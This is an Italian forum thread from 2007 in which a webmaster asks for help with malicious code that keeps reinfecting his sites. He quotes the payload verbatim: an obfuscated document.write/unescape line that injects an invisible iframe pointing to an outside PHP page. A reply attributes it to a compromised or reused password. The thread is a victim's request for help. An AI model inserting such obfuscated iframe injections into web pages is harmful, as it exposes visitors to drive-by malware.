| Precedente :: Successivo |
| Autore |
Messaggio |
cuba74 Nuovo del Forum

|
Inviato: Sab Ott 27, 2007 12:11 pm Oggetto: codice maligno nelle mie pagine web...help me! |
|
|
Salve a tutti, sono un nuovo iscritto....ho un grosso problema spero che Voi possiate aiutarmi.
Non sono un grosso esperto ma come seconda attività creo e gestisco alcuni siti web (circa 15) e ultimamente in tutti i miei siti si è inserito un codice "maligno" che vi riporto:
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%67%61%7A%65%6E%76%61%67%65%6E%2E%63%6F%6D%2F%69%6D%67%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
tale codice, credo, provvede ad aprire un altro indirizzo effettuando un download di qualke file exe o rabba simile, sta di fatto che i miei antivirus lo rivelano!
nonstante io provveda a rimuoverlo da tutte le pagine html , per magia, dopo un po', ricomapare....
Ho provato anche a cambiare le psw ftp del mio host .....ma niente!
l'unica soluzione adesso da me adottata è stata la completa rimozione di tutti i file presenti nel mio spazio con conseguente frustrante disservizio per i miei cliente!
Anche la pagina semplice "sito in manutenzione" dopo un po' viene infettata!
P.s. ho anche formattato il mio pc e analizzato per bene tutte le mie pagine html.
Spero che qualcuno possa aiutarmi! Saluti Antonello |
|
| Torna in cima |
|
 |
gizasmc Veterano del Forum

|
Inviato: Sab Ott 27, 2007 2:12 pm Oggetto: |
|
|
è uno script criptato che appunto ti apre un altro indirizzo, se il tipo ha avuto accesso a tutti 15 i tuoi siti o ti conosce bene oppure hai la stessa pass per tutti i siti. _________________
 |
|
| Torna in cima |
|
 |
cuba74 Nuovo del Forum

|
Inviato: Sab Ott 27, 2007 3:10 pm Oggetto: |
|
|